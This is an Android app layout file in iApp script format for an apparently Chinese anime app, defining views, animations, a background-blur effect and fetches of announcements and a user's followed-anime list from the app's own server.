<View id="1" did="0" type="RelativeLayout">
<ppt>width=-1
height=-1
background=white
</ppt>
<event></event>
</View>
<View id="12" did="1" type="LinearLayout">
<ppt>width=-1
//height=250dp
height=150dp
orientation=vertical</ppt>
<event></event>
</View>
<View id="18" did="12" type="LinearLayout">
<ppt>width=-1
height=-2
orientation=vertical</ppt>
<event></event>
</View>
<View id="9" did="1" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical</ppt>
<event></event>
</View>
<View id="43" did="9" type="RelativeLayout">
<ppt>width=-1
height=-1</ppt>
<event></event>
</View>
<View id="22" did="43" type="LinearLayout">
<ppt>width=-1
height=201dp
//171
orientation=vertical</ppt>
<event></event>
</View>
<View id="23" did="22" type="CardView">
<ppt>width=-1
height=180dp
//150
app_CardcornerRadius=0dp
app_CardElevation=0dp
app_CardBackgroundColor=#00ffffff</ppt>
<event></event>
</View>
<View id="25" did="23" type="ImageView">
<ppt>width=-1
height=175dp
//145
src=@-21230b99d659cdcd.jpg
scaleType=centercrop</ppt>
<event></event>
</View>
<View id="24" did="23" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical</ppt>
<event></event>
</View>
<View id="26" did="23" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=bottom</ppt>
<event></event>
</View>
<View id="27" did="26" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical</ppt>
<event></event>
</View>
<View id="28" did="22" type="LinearLayout">
<ppt>width=-1
height=20dp
orientation=vertical</ppt>
<event></event>
</View>
<View id="44" did="43" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical</ppt>
<event></event>
</View>
<View id="8" did="44" type="LinearLayout">
<ppt>width=-1
height=-2
orientation=vertical</ppt>
<event></event>
</View>
<View id="2" did="44" type="CoordinatorLayout">
<ppt>width=-1
height=-1</ppt>
<event></event>
</View>
<View id="45" did="2" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical</ppt>
<event></event>
</View>
<View id="20" did="45" type="CardView">
<ppt>width=-1
height=-2
layout_marginLeft=10dp
layout_marginRight=10dp
layout_marginTop=15dp
app_CardcornerRadius=7dp
app_CardElevation=-5dp
app_CardBackgroundColor=#4dffffff</ppt>
<event></event>
</View>
<View id="21" did="20" type="LinearLayout">
<ppt>width=-1
height=-2
orientation=vertical</ppt>
<event></event>
</View>
<View id="3" did="21" type="AppBarLayout">
<ppt>width=-1
height=100dp
BackgroundColor=#80ffffff</ppt>
<event></event>
</View>
<View id="7" did="3" type="CollapsingToolbarLayout">
<ppt>width=-1
height=-2
app_layout_scrollflags=scroll |exitUntilCollapsed
visibility=gone</ppt>
<event></event>
</View>
<View id="5" did="3" type="Toolbar">
<ppt>width=-1
height=-2
app_title=动漫
background=through</ppt>
<event></event>
</View>
<View id="4" did="3" type="TabLayout">
<ppt>width=-1
height=-2
app_tabTextColor=#ffcbcbcb|#ffe3ab00
app_tabIndicatorWidth=11.5dp
app_tabIndicatorHeight=3.5dp
app_tabGravity=0
app_tabMode=0
layout_marginBottom=3dp
visibility=invisible
background=through
layout_marginLeft=3dp
layout_marginRight=3dp
layout_marginBottom=5dp</ppt>
<event></event>
</View>
<View id="46" did="45" type="ViewPager">
<ppt>width=-1
height=-1
//layout_marginTop=245dp
overScrollMode=never
scrollbars=none
</ppt>
<event><eventItme type="onpageselected">




dhas(dh,4, "scaleY", 1.0,0.9)
dh(dh, "duration", 300)
dh(dh, "start")

dhas(dh,4, "scaleX", 1.0,0.9)
dh(dh, "duration", 300)
dh(dh, "start")

t()
{
  stop("280")
  ufnsui()
  {
    dhas(dh,4, "scaleY", 0.9,1.0)
dh(dh, "duration", 500)
dh(dh, "start")

dhas(dh,4, "scaleX", 0.9,1.0)
dh(dh, "duration", 500)
dh(dh, "start")
  }
}










f(st_pN=="0")
{

/.
ug(37,"visibility",hj)
f(hj =="0")
{


}
else
{
us(37,"visibility",0)

dhas(dh,37, "scaleY", 0.0,1.0)
dh(dh, "duration", 400)
dh(dh, "start")

dhas(dh,37, "scaleX", 0.0,1.0)
dh(dh, "duration", 400)
dh(dh, "start")

dhas(dh, 37, "translationY",-100,0)
dh(dh, "duration", 50)
dh(dh, "start")


dhas(dh, 46, "translationY",0,670)
dh(dh, "duration", 600)
dh(dh, "start")
dhon(dh)
{

us(46,"layout_marginbottom","242dp")
}
}

./



}
else f(st_pN=="1")
{

/.
ug(37,"visibility",hj)
f(hj =="0")
{

dhas(dh,37, "scaleY", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")
dhon(dh)
{

us(37,"visibility",8)  

}


dhas(dh,37, "scaleX", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")

dhas(dh, 37, "translationY",0,-100)
dh(dh, "duration", 200)
dh(dh, "start")


dhas(dh, 46, "translationY",670,0)
dh(dh, "duration", 550)
dh(dh, "start")
us(46,"layout_marginbottom","0dp")
}
else
{


}

./


}
else f(st_pN=="2")
{

/.
ug(37,"visibility",hj)
f(hj =="0")
{

dhas(dh,37, "scaleY", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")
dhon(dh)
{

us(37,"visibility",8)  

}


dhas(dh,37, "scaleX", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")

dhas(dh, 37, "translationY",0,-100)
dh(dh, "duration", 200)
dh(dh, "start")
us(46,"layout_marginbottom","0dp")

dhas(dh, 46, "translationY",670,0)
dh(dh, "duration", 550)
dh(dh, "start")

}
else
{
}
./
}

else f(st_pN=="3")
{
/.
ug(37,"visibility",hj)
f(hj =="0")
{

dhas(dh,37, "scaleY", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")
dhon(dh)
{

us(37,"visibility",8)  

}


dhas(dh,37, "scaleX", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")

dhas(dh, 37, "translationY",0,-100)
dh(dh, "duration", 200)
dh(dh, "start")

us(46,"layout_marginbottom","0dp")
dhas(dh, 46, "translationY",670,0)
dh(dh, "duration", 550)
dh(dh, "start")
./
}
else
{
}

}
else f(st_pN=="4")
{
/.
ug(37,"visibility",hj)
f(hj =="0")
{

dhas(dh,37, "scaleY", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")
dhon(dh)
{

us(37,"visibility",8)  

}


dhas(dh,37, "scaleX", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")

dhas(dh, 37, "translationY",0,-100)
dh(dh, "duration", 200)
dh(dh, "start")
us(46,"layout_marginbottom","0dp")

dhas(dh, 46, "translationY",670,0)
dh(dh, "duration", 550)
dh(dh, "start")

}
else
{
}
./
}</eventItme></event>
</View>
<View id="19" did="2" type="LinearLayout">
<ppt>width=-1
height=55dp
orientation=horizontal
gravity=right|center
layout_marginRight=10dp
layout_marginTop=10dp</ppt>
<event></event>
</View>
<View id="29" did="19" type="CardView">
<ppt>width=75dp
height=25dp
app_CardcornerRadius=15dp
app_CardBackgroundColor=#0d060606
app_CardElevation=-5dp
visibility=invisible</ppt>
<event></event>
</View>
<View id="16" did="29" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=left|center
BackgroundRipple=#ffffffff</ppt>
<event><eventItme type="pressmenu">





/.



title:操作
case 搜索:



s id="1"
//9控件id

s a = "pxw"
swh(a, width)

s a = "pxhh"
swh(a, heightt)

s a = "pxztl"
//获取屏幕状态栏高度的px像素
swh(a, 状态栏)

s(状态栏+状态栏+25,jh)

s(heightt+jh,height)


s path="/storage/emulated/0/ims.png"

gvs(id,d)
loadjar("bitmaps.dex",js)

cls(js,"com.iee.os.bitmap",im)
cls(js,"com.iee.os.prss",ime)
javanew(x,im)
javanew(l,ime)

javax(k,x,im,"getViewBitmap","android.view.View",d,"int",width,"int",height)
javax(ks,l,ime,"saveBitmap","android.graphics.Bitmap",k,"String",path)


f(ks!="null")
{
  ss("已保存到:"+path,in)
 sran(100000, 1000000, a)
ss("%Android/data/com.cjzwj.top/files/dli/"+a+".so",列表点击背景模糊)
  ft("%ims.png",列表点击背景模糊, c)
//  tw(c) 

s 路径=列表点击背景模糊
s 半径="6"
s 模糊度 ="6"

cls("android.graphics.Bitmap",图像类)
cls("android.renderscript.RenderScript",高斯类)
cls("android.renderscript.Element",指针类)
cls("android.renderscript.ScriptIntrinsicBlur",模糊类)
cls("android.renderscript.Allocation",计算类)

sbp(路径,img)
javax(bmpw, img, 图像类,"getWidth")
s(bmpw/半径,bmpw)
javax(bmph, img, 图像类,"getHeight")
s(bmph/半径,bmph)

javax(img,null,图像类,"createScaledBitmap",图像类,img,"int",bmpw,"int",bmph,"boolean",false)
javax(rs,null,高斯类,"create","android.content.Context",activity)
javax(eme,null,指针类,"U8_4",高斯类,rs)
javax(sb,null,模糊类,"create",高斯类,rs,指针类,eme)

javax(inp,null,计算类,"createFromBitmap",高斯类,rs,图像类,img)
javax(inpget,inp,计算类,"getType")
javax(otp,null,计算类,"createTyped",高斯类,rs,"android.renderscript.Type",inpget)

javax(null,sb,模糊类,"setRadius","float",模糊度)
javax(null,sb,模糊类,"setInput",计算类,inp)
javax(null,sb,模糊类,"forEach",计算类,otp)
javax(null,otp,计算类,"copyTo",图像类,img)

javax(null,rs,高斯类,"destroy")
java(null,sb,"android.renderscript.BaseObj.destroy")

//最后输出img，可以设置src或者bg
us(搜索.2,"src",img)


}
else
{
//  tw("保存失败")
}
             

             





             

             


us(搜索.1,"visibility",0)
dhas(dh, 搜索.5, "scaleX",0.8,1.0)
dh(dh, "duration", 700)
dh(dh, "start")
        
dhas(dh, 搜索.5, "scaleY",0.8,1.0)
dh(dh, "duration", 700)
dh(dh, "start")
        
dhas(dh, 搜索.5, "translationY",-80,0)     
dh(dh, "duration", 700)
dh(dh, "start")

dha(dh, false,true)
dh(dh, "duration", 400)
us(搜索.5, "dh", dh)

             
us(搜索.34,"visibility",0)
dhas(dh, 搜索.34, "scaleX",0.8,1.0)
dh(dh, "duration", 700)
dh(dh, "start")
        
dhas(dh, 搜索.34, "scaleY",0.8,1.0)
dh(dh, "duration", 700)
dh(dh, "start")
        
dhas(dh, 搜索.34, "translationY",350,0)     
dh(dh, "duration", 800)
dh(dh, "start")

dha(dh, false,true)
dh(dh, "duration", 400)
us(搜索.34, "dh", dh)

  
break</eventItme><eventItme type="clicki">

us(30,"text","关闭")
us(31,"text","可执行")





/.
dhas(dh,37, "scaleY", 1.0,0.0)
dh(dh, "duration", 1000)
dh(dh, "start")
dhon(dh)
{
dha(dh, true,false)
dh(dh, "duration", 600)
us(37, "dh", dh)
dhon(dh)
{
us(37,"visibility",8)
}

}
dhas(dh,37, "scaleX", 1.0,0.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh, 37, "translationY",0,-100)
dh(dh, "duration", 600)
dh(dh, "start")

ug(37,"visibility",hj)
f(hj =="0")
{

dhas(dh, 46, "translationY",0,670)
dh(dh, "duration", 1300)
dh(dh, "start") 

}
else
{

}

./


fr("%Android/data/com.cjzwjdm/files/模糊补偿.html",补偿)
sj(补偿,"补偿","补偿",补偿输出)
sj(补偿,"参数","参数",参数输出)
//ss("当前数值(默认100以上) :"+参数输出,叔叔)
//us(设置弹窗.38,"hint",叔叔) 
f(补偿输出 == "关")
{

  
s a = "pxw"
swh(a, ss.width)

s a = "pxhh"
swh(a, ss.height)

s a = "pxztl"
//获取屏幕状态栏高度的px像素
swh(a, 状态栏)

//s(状态栏+状态栏,jhk)

//s(heightt+状态栏,ss.height)

   

}
else
{



s a = "pxw"
swh(a, ss.width)

s a = "pxhh"
swh(a, heightt)

s a = "pxztl"
//获取屏幕状态栏高度的px像素
swh(a, 状态栏)


//s(状态栏+参数输出,jh)

s(heightt+参数输出,ss.height)  
    
    

}


s path="/storage/emulated/0/ims.png"

gvs(1,d)
loadjar("bitmaps.dex",js)

cls(js,"com.iee.os.bitmap",im)
cls(js,"com.iee.os.prss",ime)
javanew(x,im)
javanew(l,ime)

javax(k,x,im,"getViewBitmap","android.view.View",d,"int",ss.width,"int",ss.height)
javax(ks,l,ime,"saveBitmap","android.graphics.Bitmap",k,"String",path)


f(ks!="null")
{
  ss("已保存到:"+path,in)
 sran(100000, 1000000, a)
ss("%Android/data/com.cjzwjdm/files/dli/"+a+".so",列表点击背景模糊)
  ft("%/storage/emulated/0/ims.png",列表点击背景模糊, c)
  
//  tw(c) 

s 路径=列表点击背景模糊
s 半径="6"
s 模糊度 ="6"

cls("android.graphics.Bitmap",图像类)
cls("android.renderscript.RenderScript",高斯类)
cls("android.renderscript.Element",指针类)
cls("android.renderscript.ScriptIntrinsicBlur",模糊类)
cls("android.renderscript.Allocation",计算类)

sbp(路径,img)
javax(bmpw, img, 图像类,"getWidth")
s(bmpw/半径,bmpw)
javax(bmph, img, 图像类,"getHeight")
s(bmph/半径,bmph)

javax(img,null,图像类,"createScaledBitmap",图像类,img,"int",bmpw,"int",bmph,"boolean",false)
javax(rs,null,高斯类,"create","android.content.Context",activity)
javax(eme,null,指针类,"U8_4",高斯类,rs)
javax(sb,null,模糊类,"create",高斯类,rs,指针类,eme)

javax(inp,null,计算类,"createFromBitmap",高斯类,rs,图像类,img)
javax(inpget,inp,计算类,"getType")
javax(otp,null,计算类,"createTyped",高斯类,rs,"android.renderscript.Type",inpget)

javax(null,sb,模糊类,"setRadius","float",模糊度)
javax(null,sb,模糊类,"setInput",计算类,inp)
javax(null,sb,模糊类,"forEach",计算类,otp)
javax(null,otp,计算类,"copyTo",图像类,img)

javax(null,rs,高斯类,"destroy")
java(null,sb,"android.renderscript.BaseObj.destroy")

//最后输出img，可以设置src或者bg
us(搜索.2,"src",img)


}
else
{
//  tw("保存失败")
}
             

             





             

             


us(搜索.1,"visibility",0)

dhas(dh, 搜索.5, "scaleX",0.8,1.0)
dh(dh, "duration", 600)
dh(dh, "start")
        
dhas(dh, 搜索.5, "scaleY",0.8,1.0)
dh(dh, "duration", 600)
dh(dh, "start")
        
dhas(dh, 搜索.5, "translationY",-80,0)     
dh(dh, "duration", 600)
dh(dh, "start")

dha(dh, false,true)
dh(dh, "duration", 400)
us(搜索.5, "dh", dh)

dha(dh, false,true)
dh(dh, "duration", 620)
us(搜索.2, "dh", dh)

             
us(搜索.34,"visibility",0)
dhas(dh, 搜索.34, "scaleX",0.8,1.0)
dh(dh, "duration", 600)
dh(dh, "start")
        
dhas(dh, 搜索.34, "scaleY",0.8,1.0)
dh(dh, "duration", 600)
dh(dh, "start")
        
dhas(dh, 搜索.34, "translationY",350,0)     
dh(dh, "duration", 700)
dh(dh, "start")

dha(dh, false,true)
dh(dh, "duration", 600)
us(搜索.34, "dh", dh)

  </eventItme></event>
</View>
<View id="17" did="16" type="ImageView">
<ppt>width=16dp
height=16dp
src=@a7065e76da9.png
layout_marginTop=3dp
layout_marginLeft=10dp</ppt>
<event></event>
</View>
<View id="32" did="19" type="CardView">
<ppt>width=25dp
height=25dp
app_CardcornerRadius=15dp
app_CardBackgroundColor=#00060606
app_CardElevation=-5dp
layout_marginLeft=10dp
visibility=invisible</ppt>
<event></event>
</View>
<View id="33" did="32" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center
BackgroundRipple=#ffffffff</ppt>
<event><eventItme type="pressmenu">





/.



title:操作
case 搜索:



s id="1"
//9控件id

s a = "pxw"
swh(a, width)

s a = "pxhh"
swh(a, heightt)

s a = "pxztl"
//获取屏幕状态栏高度的px像素
swh(a, 状态栏)

s(状态栏+状态栏+25,jh)

s(heightt+jh,height)


s path="/storage/emulated/0/ims.png"

gvs(id,d)
loadjar("bitmaps.dex",js)

cls(js,"com.iee.os.bitmap",im)
cls(js,"com.iee.os.prss",ime)
javanew(x,im)
javanew(l,ime)

javax(k,x,im,"getViewBitmap","android.view.View",d,"int",width,"int",height)
javax(ks,l,ime,"saveBitmap","android.graphics.Bitmap",k,"String",path)


f(ks!="null")
{
  ss("已保存到:"+path,in)
 sran(100000, 1000000, a)
ss("%Android/data/com.cjzwj.top/files/dli/"+a+".so",列表点击背景模糊)
  ft("%ims.png",列表点击背景模糊, c)
//  tw(c) 

s 路径=列表点击背景模糊
s 半径="6"
s 模糊度 ="6"

cls("android.graphics.Bitmap",图像类)
cls("android.renderscript.RenderScript",高斯类)
cls("android.renderscript.Element",指针类)
cls("android.renderscript.ScriptIntrinsicBlur",模糊类)
cls("android.renderscript.Allocation",计算类)

sbp(路径,img)
javax(bmpw, img, 图像类,"getWidth")
s(bmpw/半径,bmpw)
javax(bmph, img, 图像类,"getHeight")
s(bmph/半径,bmph)

javax(img,null,图像类,"createScaledBitmap",图像类,img,"int",bmpw,"int",bmph,"boolean",false)
javax(rs,null,高斯类,"create","android.content.Context",activity)
javax(eme,null,指针类,"U8_4",高斯类,rs)
javax(sb,null,模糊类,"create",高斯类,rs,指针类,eme)

javax(inp,null,计算类,"createFromBitmap",高斯类,rs,图像类,img)
javax(inpget,inp,计算类,"getType")
javax(otp,null,计算类,"createTyped",高斯类,rs,"android.renderscript.Type",inpget)

javax(null,sb,模糊类,"setRadius","float",模糊度)
javax(null,sb,模糊类,"setInput",计算类,inp)
javax(null,sb,模糊类,"forEach",计算类,otp)
javax(null,otp,计算类,"copyTo",图像类,img)

javax(null,rs,高斯类,"destroy")
java(null,sb,"android.renderscript.BaseObj.destroy")

//最后输出img，可以设置src或者bg
us(搜索.2,"src",img)


}
else
{
//  tw("保存失败")
}
             

             





             

             


us(搜索.1,"visibility",0)
dhas(dh, 搜索.5, "scaleX",0.8,1.0)
dh(dh, "duration", 700)
dh(dh, "start")
        
dhas(dh, 搜索.5, "scaleY",0.8,1.0)
dh(dh, "duration", 700)
dh(dh, "start")
        
dhas(dh, 搜索.5, "translationY",-80,0)     
dh(dh, "duration", 700)
dh(dh, "start")

dha(dh, false,true)
dh(dh, "duration", 400)
us(搜索.5, "dh", dh)

             
us(搜索.34,"visibility",0)
dhas(dh, 搜索.34, "scaleX",0.8,1.0)
dh(dh, "duration", 700)
dh(dh, "start")
        
dhas(dh, 搜索.34, "scaleY",0.8,1.0)
dh(dh, "duration", 700)
dh(dh, "start")
        
dhas(dh, 搜索.34, "translationY",350,0)     
dh(dh, "duration", 800)
dh(dh, "start")

dha(dh, false,true)
dh(dh, "duration", 400)
us(搜索.34, "dh", dh)

  
break</eventItme><eventItme type="clicki">

/.
ug(37,"visibility",hj)
f(hj =="0")
{
dhas(dh,37, "scaleY", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")
dhon(dh)
{

us(37,"visibility",8)  

}


dhas(dh,37, "scaleX", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")

dhas(dh, 37, "translationY",0,-100)
dh(dh, "duration", 200)
dh(dh, "start")


dhas(dh, 46, "translationY",670,0)
dh(dh, "duration", 550)
dh(dh, "start")
us(46,"layout_marginbottom","0dp")

}
else
{


  
  
}

./

fn 底部弹窗.加载弹窗("加载.iyu")
gvs(ss.弹窗,加载.10,ss.id10)
us(ss.id10,"text","公告加载中")

/.
utw(null, "", "加载弹窗.iyu", "", true, ss.run)
{
}
gvs(ss.run,6,Id6)
us(Id6, "text","  公告加载中 ")
fn 模糊.背景模糊("1")
us(背景模糊.1,"visibility",0)
dha(dh, false, true)
dh(dh, "duration", 500)
us(背景模糊.1, "dh", dh)

./



t()
{
  hs("http://dm.cjzwjys.top/GG.txt",po)
  f(po == "null")
  {
    ufnsui()
    {

   

/.  
us(37,"visibility",0)

dha(dh, false,true)
dh(dh, "duration", 600)
us(37, "dh", dh)

dhas(dh,37, "scaleY", 0.0,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh,37, "scaleX", 0.0,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh, 37, "translationY",-100,0)
dh(dh, "duration", 600)
dh(dh, "start")
  
  dha(dh, false,true)
dh(dh, "duration", 10)
us(46, "dh", dh)
dhas(dh, 46, "translationY",0,670)
dh(dh, "duration", 10)
dh(dh, "start") 
./

  
  }
  }
  else
  {
//    endutw()
  java(null,ss.载体,"android.app.Dialog.dismiss")
  us(背景模糊.1,"visibility",0)
    ufnsui()
    {
      utw(null,"公告",po,"YEs","GO",true, v)
      {

     endutw()
/.  
us(37,"visibility",0)

dha(dh, false,true)
dh(dh, "duration", 600)
us(37, "dh", dh)

dhas(dh,37, "scaleY", 0.0,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh,37, "scaleX", 0.0,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh, 37, "translationY",-100,0)
dh(dh, "duration", 600)
dh(dh, "start")
  
  dha(dh, false,true)
dh(dh, "duration", 10)
us(46, "dh", dh)
dhas(dh, 46, "translationY",0,670)
dh(dh, "duration", 10)
dh(dh, "start") 
./

dha(dh, true,false)
dh(dh, "duration", 500)
us(背景模糊.1, "dh", dh)
dhon(dh)
{
us(背景模糊.1,"visibility",8)
}



      }
      else
      {
        ufnsui()
        {


    hws("http://dm.cjzwjys.top")
endutw()

/. 
us(37,"visibility",0)

dha(dh, false,true)
dh(dh, "duration", 600)
us(37, "dh", dh)

dhas(dh,37, "scaleY", 0.0,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh,37, "scaleX", 0.0,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh, 37, "translationY",-100,0)
dh(dh, "duration", 600)
dh(dh, "start")
  
  dha(dh, false,true)
dh(dh, "duration", 10)
us(46, "dh", dh)
dhas(dh, 46, "translationY",0,670)
dh(dh, "duration", 10)
dh(dh, "start") 

./  
 dha(dh, true,false)
dh(dh, "duration", 500)
us(背景模糊.1, "dh", dh)
dhon(dh)
{
us(背景模糊.1,"visibility",8)
} 
  
  
  
       }
        }
      }
      }
      }</eventItme></event>
</View>
<View id="34" did="33" type="ImageView">
<ppt>width=50dp
height=50dp
src=@84152eebfb5.png</ppt>
<event></event>
</View>
<View id="15" did="19" type="LinearLayout">
<ppt>width=50dp
height=50dp
orientation=vertical
gravity=center
visibility=invisible</ppt>
<event><eventItme type="pressmenu">






/.




title:操作
case 设置:


  
break</eventItme><eventItme type="clicki">
uigo("设置.iyu")</eventItme></event>
</View>
<View id="14" did="15" type="ImageView">
<ppt>width=21dp
height=21dp
src=@79192a11c7f.png</ppt>
<event></event>
</View>
<View id="6" did="2" type="ViewPager">
<ppt>width=-1
height=-1
layout_marginTop=360dp
overScrollMode=never
scrollbars=none
visibility=gone</ppt>
<event></event>
</View>
<View id="52" did="2" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=bottom|right
//visibility=gone</ppt>
<event></event>
</View>
<View id="53" did="52" type="CardView">
<ppt>width=50dp
height=50dp
app_CardcornerRadius=25dp
app_CardElevation=0dp
layout_marginRight=25dp
layout_marginBottom=25dp
app_CardBackgroundColor=#ffdef5ff</ppt>
<event></event>
</View>
<View id="56" did="53" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical</ppt>
<event></event>
</View>
<View id="54" did="53" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center</ppt>
<event></event>
</View>
<View id="55" did="54" type="ImageView">
<ppt>width=35dp
height=35dp
src=@1c7adcab15e.png</ppt>
<event><eventItme type="clicki">


fn 底部弹窗.追番("追番.iyu")


gvs(ss.弹窗,追番.1,ss.id1)
gvs(ss.弹窗,追番.10,ss.id10)
gvs(ss.弹窗,追番.11,ss.id11)
gvs(ss.弹窗,追番.14,ss.id14)
gvs(ss.弹窗,追番.17,ss.id17)
gvs(ss.弹窗,追番.20,ss.id20)



//ula(sss.v)
//清空列表对象
//ula(sss.v, null)



//  10 文字   20,11加载布局  17登录   14列表





s a = "hh"
//获取屏幕真实高度的dp
swh(a, hh)
ss(hh+"dp",jh)
//us(ss.id1,"height",jh)

us(ss.id11,"visibility",0)
us(ss.id20,"visibility",0)
us(ss.id10,"text","加载中...")
us(ss.id14,"visibility",8)
us(ss.id17,"visibility",8)

fe("%Android/data/com.cjzwjdm/cpk/用户账号.cpk",uy)
f(uy == true)
{
ufnsui()
{
//账号存在    
    
 
fr("Android/data/com.cjzwjdm/cpk/用户账号.cpk",yhm)
sj(yhm,"[","]",用户名)
sj(yhm,"(",")",密码)


t()
{

ss(sss.追番+"/api.php?act=fklist&user="+用户名,post)
hs(post,k)
//hs("http://www.cjzwjys.top/app/api.php?act=fklist&user=zwj",k)
sr(k,"/","",hk)
f(k == "null")
{
ufnsui()
{
//
us(ss.id11,"visibility",0)
us(ss.id20,"visibility",0)
us(ss.id10,"text","获取错误")
us(ss.id14,"visibility",8)
us(ss.id17,"visibility",8)

//
}
}
else
{
ufnsui()
{
//
sj(hk,"【",null,kk)
sl(kk,"【",list)
for(nr;list)
{
sj(nr,null,"】",bt)
sj(nr,"《图片》","《图片》",jpg)
sj(nr,"《网址》","《网址》",urll)
ula(v,12=jpg,14=bt,21=urll)
}
ufnsui()
{
uls(ss.id14,v,"追番列表.iyu",-1,"-2")
//判断
f(bt ? "null")
{
ufnsui()
{
//us(ss.id11,"visibility",0)
///us(ss.id20,"visibility",0)
us(ss.id10,"text","还没追番呢！")
us(ss.id14,"visibility",8)
us(ss.id17,"visibility",8)

}
}
else
{
ufnsui()
{

us(ss.id11,"visibility",8)
us(ss.id20,"visibility",8)
//us(ss.id10,"text","还没追番呢！")
us(ss.id14,"visibility",0)
us(ss.id17,"visibility",8)

}
}
//判断


}

}
}
}


   }
   }
   else
   {
     ufnsui()
     {
       us(ss.id11,"visibility",0)
       us(ss.id20,"visibility",0)
       us(ss.id14,"visibility",8)
       us(ss.id17,"visibility",0)
       us(ss.id20,"visibility",8)
     }
   }












/.
fr("Android/data/com.cjzwjdm/cpk/zhui.cpk",追番)
    sj(追番,"【",null,ne)
    sl(ne,"【",pp)
    for(ne;pp)
  {
sj(ne,null,"】",bt)
sj(ne,"&gt;图片&lt;","&gt;图片&lt;",jpg)
sj(ne,"&gt;网址&lt;","&gt;网址&lt;",urll)
ula(v,12=jpg,14=bt,21=urll)
}
ufnsui()
{
uls(ss.id14,v,"追番列表.iyu",-1,"-2")
}

./</eventItme></event>
</View>
<View id="37" did="1" type="CardView">
<ppt>width=-1
height=230dp
layout_marginLeft=10dp
layout_marginRight=10dp
layout_marginTop=165dp
app_CardcornerRadius=7dp
app_CardElevation=5dp
app_CardBackgroundColor=#ffffffff
visibility=gone</ppt>
<event></event>
</View>
<View id="38" did="37" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical</ppt>
<event></event>
</View>
<View id="39" did="38" type="LinearLayout">
<ppt>width=-1
height=-2
orientation=vertical</ppt>
<event></event>
</View>
<View id="48" did="39" type="LinearLayout">
<ppt>width=-1
height=40dp
orientation=horizontal
gravity=left|center
visibility=invisible</ppt>
<event></event>
</View>
<View id="47" did="48" type="TextView">
<ppt>width=-2
height=-2
text=每日更新
gravity=left|center
textSize=13sp
textColor=#ff060606
layout_marginLeft=15dp</ppt>
<event></event>
</View>
<View id="49" did="48" type="CardView">
<ppt>width=50dp
height=20dp
layout_marginLeft=10dp
app_CardElevation=0dp
app_CardcornerRadius=3dp
app_CardBackgroundColor=#fff1f6ff</ppt>
<event></event>
</View>
<View id="50" did="49" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center</ppt>
<event></event>
</View>
<View id="51" did="50" type="TextView">
<ppt>width=-2
height=-2
text=6+7和一起
textSize=8sp
textColor=#ff00adf7</ppt>
<event></event>
</View>
<View id="41" did="39" type="TabLayout">
<ppt>width=-1
height=40dp
app_tabTextColor=#ff7f7f7f|#fffd8200
app_tabIndicatorWidth=5dp
app_tabIndicatorHeight=3dp
app_tabGravity=1
app_tabMode=1
visibility=invisible</ppt>
<event></event>
</View>
<View id="40" did="39" type="Toolbar">
<ppt>width=-1
height=30dp
app_title=每日更新
visibility=gone</ppt>
<event></event>
</View>
<View id="42" did="38" type="ViewPager">
<ppt>width=-1
height=-1</ppt>
<event></event>
</View>
<View id="10" did="0" type="TextView">
<ppt>width=-2
height=-2
text=1
visibility=gone</ppt>
<event></event>
</View>
<View id="30" did="0" type="TextView">
<ppt>width=-2
height=-2
text=文本30
visibility=gone</ppt>
<event></event>
</View>
<View id="31" did="0" type="TextView">
<ppt>width=-2
height=-2
text=文本31
visibility=gone</ppt>
<event></event>
</View>
<View id="35" did="0" type="Button">
<ppt>width=-2
height=-2
text=按钮35
visibility=gone</ppt>
<event><eventItme type="clicki">


fn 底部弹窗.弹窗("模糊补偿.iyu")



gvs(ss.弹窗,模糊补偿.18,ss.id18)
gvs(ss.弹窗,模糊补偿.6,ss.id6)
gvs(ss.弹窗,模糊补偿.13,ss.id13)
gvs(ss.弹窗,模糊补偿.10,ss.id10)
//6是更改按钮  18是开关 13是编辑框  10是整个布局




t()
{


fr("%Android/data/com.cjzwjdm/files/模糊补偿.html",补偿)
sj(补偿,"补偿","补偿",补偿输出)
sj(补偿,"参数","参数",参数输出)
f(补偿输出 == "关")
{
  ufnsui()
  {
    
    us(ss.id18,"checked","false")
    us(ss.id6,"visibility",8) 
    us(ss.id18,"visibility",0) 
    us(ss.id10,"visibility",8) 
    
   }
  }
else
{
  ufnsui()
  {
    
    
    us(ss.id18,"checked","true")
    us(ss.id6,"visibility",0) 
    us(ss.id18,"visibility",8) 
    us(ss.id10,"visibility",0) 
    
  ss("当前参数:"+参数输出,零时参数)
  us(ss.id13,"hint",零时参数)
    
  }
}
}
</eventItme></event>
</View>
<UIEventset><eventItme type="loading">



s a = 0
s b = 0
s c = "#00ffffff|#b3F0EFF4"
s d = "#333333"
s e = "topbottom"
ngde(a, b, c, d, e, f)
us(24,"background",f)


s a = 0
s b = 0
s c = "#FFF0EFF4|#00F0EFF4"
s d = "#333333"
s e = "bottomtop"
ngde(a, b, c, d, e, f)
